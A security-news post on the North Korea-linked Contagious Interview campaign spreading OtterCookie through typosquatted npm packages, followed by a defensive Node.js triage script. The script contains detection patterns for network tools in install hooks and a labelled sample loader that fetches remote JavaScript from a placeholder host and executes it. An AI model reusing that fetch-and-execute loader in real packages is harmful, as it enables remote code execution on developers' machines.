Contagious Interview campaign expands with 197 npm Packages spreading new OtterCookie malware
- Nov 30, 2025
- 2 min read
Key Findings
North Korea-linked actors behind the Contagious Interview campaign have uploaded 197 new malicious npm packages to distribute a new version of the OtterCookie malware.
The Contagious Interview campaign, active since November 2023, targets software developers on Windows, Linux, and macOS, with a focus on those working in crypto and Web3.
Attackers pose as recruiters on platforms like LinkedIn and use social engineering tactics, including fake job interviews and trojanized demo projects, to deliver malware payloads.
The campaign's payloads commonly include the BeaverTail and OtterCookie infostealers and the InvisibleFerret RAT.
The Contagious Interview campaign continues to expand in the npm ecosystem, with the addition of 197 more malicious packages and over 31,000 downloads.
Background
The Contagious Interview campaign is an ongoing threat operation linked to North Korea. Since its inception in November 2023, the campaign has primarily targeted software developers working in the crypto and Web3 space on various platforms, including Windows, Linux, and macOS.
The attackers behind the campaign typically pose as recruiters on platforms like LinkedIn and use social engineering tactics, such as fake job interviews and trojanized demo projects, to deliver their malware payloads. These payloads commonly include the BeaverTail and OtterCookie infostealers, as well as the InvisibleFerret remote access tool (RAT).
Expansion in the npm Ecosystem
The Contagious Interview campaign has continued to expand its reach, with the addition of 197 new malicious npm packages and over 31,000 downloads. This latest wave of activity reinforces the campaign's systematic, factory-style approach to targeting developers through the npm ecosystem.
Malicious npm Packages and Payload Delivery
The researchers investigated the malicious npm package "tailwind-magic" and uncovered a Vercel-hosted staging site (tetrismic[.]vercel[.]app) that led them to a threat actor–controlled GitHub account, "stardev0914". This account contained 18 repositories, which the North Korean operators used to build a full delivery system.
The attackers store malware on GitHub, fetch the latest payload from Vercel, and use a separate C2 server for data theft and tasking. At least five npm packages (tailwind-magic, tailwind-node, node-tailwind, node-tailwind-magic, and react-modal-select) use this setup to drop a second-stage payload.
When victims install these packages, the code pulls an OtterCookie variant that checks for virtual machines, fingerprints the device, and opens a long-term C2 link. This gives the attackers a remote shell, keylogging, clipboard theft, screenshots, and credential and wallet harvesting capabilities across major operating systems.
Crypto-Themed Lures and Infrastructure
The Contagious Interview operators use crypto-themed GitHub repositories as lures to deliver malware through malicious npm packages. A cloned Knightsbridge DEX site ("dexproject") embeds the backdoored node-tailwind package, which loads and runs attacker-controlled code during dependency installation.
The tailwind-magic repo similarly supports a typosquatted npm package that impersonates tailwind-merge and fetches remote JavaScript from tetrismic[.]vercel[.]app, turning it into a loader for OtterCookie malware. Other repos act as decoy crypto projects to entice developers into installing the compromised packages during fake job assignments.
The attackers' infrastructure is split across GitHub (development), Vercel (payload delivery), and a separate C2 server (tasking and data collection), allowing them to rotate payloads, customize attacks, and keep C2 activity low until the second-stage malware launches.
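The delivery chain described above (a package whose install step runs code that fetches JavaScript from a remote host and executes it, published under a name that rides on a well-known package such as tailwind-merge) leaves static traces a defender can look for before a package ever runs. The following Node.js script is an added example written for this page; it is not code from the article, the researchers, or the campaign. It triages a package manifest and its entry-point source for three things: install-time lifecycle hooks (and whether they reach the network), a fetch-then-execute loader pattern, and a package name that looks like a well-known one. All manifests and sources in the block are constructed samples, and the staging host `staging.example.invalid` is a placeholder, not an indicator from the article.

```javascript
'use strict';

// npm lifecycle hooks that run automatically during `npm install`.
const HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic indicators that an install hook talks to the network or runs
// inline code. These are triage hints, not signatures.
const HOOK_INDICATORS = [
  /\bcurl\b/, /\bwget\b/, /\bnode\s+-e\b/, /https?:\/\//i, /\bpowershell\b/i,
];

// Loader pattern in source: a network fetch combined with dynamic execution.
const FETCH_RE = /\b(fetch|axios\.get|https?\.get|request)\s*\(/;
const EXEC_RE = /\b(eval|new\s+Function|vm\.runInThisContext|vm\.runInNewContext)\s*\(/;
const URL_RE = /https?:\/\/[^\s'"`)]+/g;

// Standard Levenshtein edit distance between two strings.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      d[i][j] = Math.min(
        d[i - 1][j] + 1,
        d[i][j - 1] + 1,
        d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1),
      );
    }
  }
  return d[a.length][b.length];
}

// Look-alike check: an exact allow-list hit is fine; otherwise flag names
// within two edits of a known package, or names that reuse a known package's
// leading brand token (e.g. "tailwind") in a different arrangement.
function lookAlike(name, knownPackages) {
  if (knownPackages.includes(name)) return null;
  const tokens = new Set(name.split(/[-_.]/));
  for (const known of knownPackages) {
    if (editDistance(name, known) <= 2) return { near: known, reason: 'edit-distance' };
    const brand = known.split(/[-_.]/)[0];
    if (brand.length >= 5 && tokens.has(brand)) return { near: known, reason: 'shared-brand-token' };
  }
  return null;
}

// Returns a list of findings for one package; an empty list means nothing
// in these heuristics fired (which is not proof of safety).
function triagePackage(pkg, sourceText, knownPackages) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const hits = HOOK_INDICATORS.filter((re) => re.test(cmd)).length;
    findings.push({ kind: hits ? 'install-hook-network' : 'install-hook', detail: `${hook}: ${cmd}` });
  }
  if (FETCH_RE.test(sourceText) && EXEC_RE.test(sourceText)) {
    const urls = sourceText.match(URL_RE) || [];
    findings.push({ kind: 'remote-code-loader', detail: urls.join(', ') || '(url built at runtime)' });
  }
  const la = lookAlike(pkg.name, knownPackages);
  if (la) findings.push({ kind: 'look-alike-name', detail: `${pkg.name} ~ ${la.near} (${la.reason})` });
  return findings;
}

// --- constructed sample inputs (not real package contents) ---
const KNOWN = ['tailwind-merge', 'tailwindcss', 'react-select', 'lodash'];

// A benign package: no install hooks, static code.
const benignPkg = { name: 'lodash', version: '4.17.21', scripts: { test: 'mocha' } };
const benignSrc = 'module.exports = { chunk(a, n) { return a.slice(0, n); } };';

// A suspicious package modelled on the loader pattern the article describes:
// a postinstall hook runs the entry point, which fetches JavaScript from a
// remote host and executes it. Host and path are placeholders.
const suspiciousPkg = { name: 'tailwind-magic', version: '1.0.3', scripts: { postinstall: 'node index.js' } };
const suspiciousSrc = [
  "const res = await fetch('https://staging.example.invalid/payload.js');",
  'new Function(await res.text())();',
].join('\n');

console.log('benign    :', triagePackage(benignPkg, benignSrc, KNOWN));
console.log('suspicious:', triagePackage(suspiciousPkg, suspiciousSrc, KNOWN));
```

In practice the same checks can be run in CI against every manifest and entry file under `node_modules` after a lockfile-pinned install, with `ignore-scripts=true` set in `.npmrc` so that lifecycle hooks are inspected rather than executed; the brand-token rule is deliberately broad and is meant to route a package to a human review, not to block it on its own.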
Sources
https://securityaffairs.com/185170/apt/contagious-interview-campaign-expands-with-197-npm-ppackages-spreading-new-ottercookie-malware.html
https://x.com/Dinosn/status/1994966243288519149